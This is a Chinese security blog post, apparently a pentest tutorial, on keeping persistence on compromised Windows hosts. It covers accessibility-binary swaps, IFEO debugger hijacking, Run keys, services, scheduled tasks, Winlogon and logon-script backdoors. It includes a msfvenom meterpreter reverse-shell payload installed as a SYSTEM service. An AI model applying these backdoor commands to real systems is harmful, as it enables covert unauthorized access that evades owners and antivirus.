原创 | Windows后渗透之权限维持

admin 2021年5月26日21:23:50评论89 views字数 3291阅读10分58秒阅读模式
原创 | Windows后渗透之权限维持
点击上方蓝字 关注我吧


原创 | Windows后渗透之权限维持
辅助功能劫持
原创 | Windows后渗透之权限维持


Windows10 有一些辅助功能。这些功能可以在用户登录之前以组合键启动。根据这个特征,一些恶意软件无需登录到系统,通过远程桌面协议就可以执行恶意代码。

一些常见的辅助功能如:


C:WindowsSystem32sethc.exe    粘滞键   快捷键:按五次 shift    C:WindowsSystem32utilman.exe    设置中心   快捷键:Windows+U    C:WindowsSystem32Magnify.exe   放大镜      快捷键:Windows+加减号


最常见的验证方法就是将cmd.exe的文件名换成上面的名字,然后使用对应的快捷键就可以调出cmd窗口了。

可能会遇到的问题:

我在实现这个操作的时候会遇到需要TrustedInstaller权限的情况,解决方法就是打开这个文件的属性,然后在安全栏目里点击高级,然后再点击更改,再点击一次高级,进入之后点击立即查找,双击你有权限操作的用户就可以了。

原创 | Windows后渗透之权限维持原创 | Windows后渗透之权限维持原创 | Windows后渗透之权限维持

原创 | Windows后渗透之权限维持
镜像劫持
原创 | Windows后渗透之权限维持


所谓的镜像劫持,就是在注册表的[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NT CurrentVersionImage File Execution Options]处新建一个以杀毒软件主程序命名的项(也可以是自启动程序命名的项),例如Rav.exe。
然后再创建一个子键“Debugger="C:1.bat”(里面可以写命令,这里也可以是一些可执行程序的路径)。当我们双击打开那个程序时,就会运行Debugger路径的程序。


原创 | Windows后渗透之权限维持
原理
原创 | Windows后渗透之权限维持


当我们双击运行程序时,系统会查询该IFEO注册表,如果发现存在和该程序名称完全相同的子键,就查询对应子健中包含的“dubugger”键值名。
如果该参数不为空,系统则会把 Debugger 参数里指定的程序文件名作为用户试图启动的程序执行请求来处理。这样成功执行的是遭到“劫持”的虚假程序。


原创 | Windows后渗透之权限维持
实验
原创 | Windows后渗透之权限维持


  1. 首先新建一个bat文件,内容是calc
  2. 以管理员权限打开CMD,键入命令reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsQQ.EXE" /v debugger /t REG_SZ /d "C:Users123.bat"
  3. 双击运行QQ,会出现一个CMD的窗口一闪而过,这是bat文件在运行,然后调用计算器。

原创 | Windows后渗透之权限维持原创 | Windows后渗透之权限维持

原创 | Windows后渗透之权限维持
启动目录
原创 | Windows后渗透之权限维持


将可执行文件放入启动目录下,开机会自动运行。
启动文件夹路径:

C:Users用户名AppDataRoamingMicrosoftWindowsStartMenuProgramsStartupC:ProgramDataMicrosoftWindowsStartMenuProgramsStartup%USERPROFILE%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup

隐藏文件


attrib +h +s xxx.exe


原创 | Windows后渗透之权限维持
相关键值
原创 | Windows后渗透之权限维持


Startup键值指向启动文件夹HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerShell FoldersHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShell Folders


原创 | Windows后渗透之权限维持
启动时注册表后门
原创 | Windows后渗透之权限维持


启动项键值路径 

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce


首先在123.bat文件中敲入calc,然后将路径添加到注册表键值中

原创 | Windows后渗透之权限维持

注销后重新登录,成功打开计算器

原创 | Windows后渗透之权限维持最后附赠命令行方式快速添加


reg add 

HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "Keyname" /t REG_SZ /d "C:123.bat" /f


原创 | Windows后渗透之权限维持
启动时服务后门
原创 | Windows后渗透之权限维持


Windows的服务程序通常默默的运行在后台,且拥有 SYSTEM 权限,非常适合用于后门持久化。我们可以将EXE/DLL等可执行文件注册为服务实现后门持久化。
首先在KALI生成后门,再将后门上传到被控主机上
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.138 LPORT=5555 -f exe >/tmp/pentestlab.exe


打开被控制的主机输入

sc create pentestlab binpath= "cmd /k C:userstestpentestlab.exe" start= "auto" obj= "LocalSystem"sc start pentest

原创 | Windows后渗透之权限维持

powershell创建服务


New-Service -Name "pentestlab"-BinaryPathName "C:userstestpentestlab.exe" -Description"PentestLaboratories" -StartupType Automaticsc start pentestlab



原创 | Windows后渗透之权限维持
系统计划任务后门
原创 | Windows后渗透之权限维持


Windows实现定时任务主要有schtasks与at二种方式,通过计划任务

At 适用于windows xp/2003,Schtasks适用于win7/2008+

用管理员权限打开命令行:schtasks /create /sc onlogon /tn calc /tr c:123.bat
注销重新登录

原创 | Windows后渗透之权限维持

原创 | Windows后渗透之权限维持
Winlogon用户登陆初始化
原创 | Windows后渗透之权限维持


Winlogon.exe 进程是 Windows 操作系统中非常重要的一部分,Winlogon 用于执行与 Windows 登录过程相关的各种关键任务。

在注册表路径

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon的Userinit项指向userinit.exe,是用户登录时执行的用户初始化程序。

原创 | Windows后渗透之权限维持

可以在后面加上可执行程序的绝对路径,在用户登录时将被执行。
还有一个命令行方式添加的,只能用powershell才可以添加,cmd添加后reg query是变了,但是注册表界面里的值却没有改变,也不会生效,有大佬知道的麻烦教教我。
Set-ItemProperty  "HKLM:SOFTWAREMicrosoftWINDOWS NTCurrentVersionWinlogon" -name   Userinit -value "C:Windowssystem32userinit.exe,C:123.bat"


原创 | Windows后渗透之权限维持
Logon Scripts 后门
原创 | Windows后渗透之权限维持


在注册表路径为HKEY_CURRENT_USEREnvironment下创建一个字符串键值UserInitMprLogonScript
这里面的值是Windows登录脚本,当用户登录时触发,Logon Scripts能够优先于杀毒软件执行,绕过杀毒软件对敏感操作的拦截。
命令行方式:reg add "HKCUEnvironment" /v "UserInitMprLogonScript" /t REG_SZ /d "c:script123.bat"


原创 | Windows后渗透之权限维持
远程登陆实现多人登陆一个账号
原创 | Windows后渗透之权限维持


环境:Windows server 2012

打开cmd,输入gpedit.msc 组策略,找到【计算机设置】–【管理模板】–【windows组件】–【远程桌面服务】–【远程桌面会话主机】–【连接】

按照以下步骤操作:
1、拒绝将已经登录到控制台会话的管理员注销—选择启用
2、限制连接的数量—选择启用,配置‘允许的RD最大连接数’为10个
3、将远程桌面服务用户限制到单独的远程桌面服务会话—选择禁用

原创 | Windows后渗透之权限维持gpupdate /force 命令到管理员命令提示符窗口中
原创 | Windows后渗透之权限维持远程登录结果原创 | Windows后渗透之权限维持

权限维持


原创 | Windows后渗透之权限维持
原创 | Windows后渗透之权限维持
原创 | Windows后渗透之权限维持

原创 | Windows后渗透之权限维持
你要的分享、在看与点赞都在这儿~

本文始发于微信公众号(SecIN技术平台):原创 | Windows后渗透之权限维持

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月26日21:23:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   原创 | Windows后渗透之权限维持https://cn-sec.com/archives/271576.html

发表评论

匿名网友 填写信息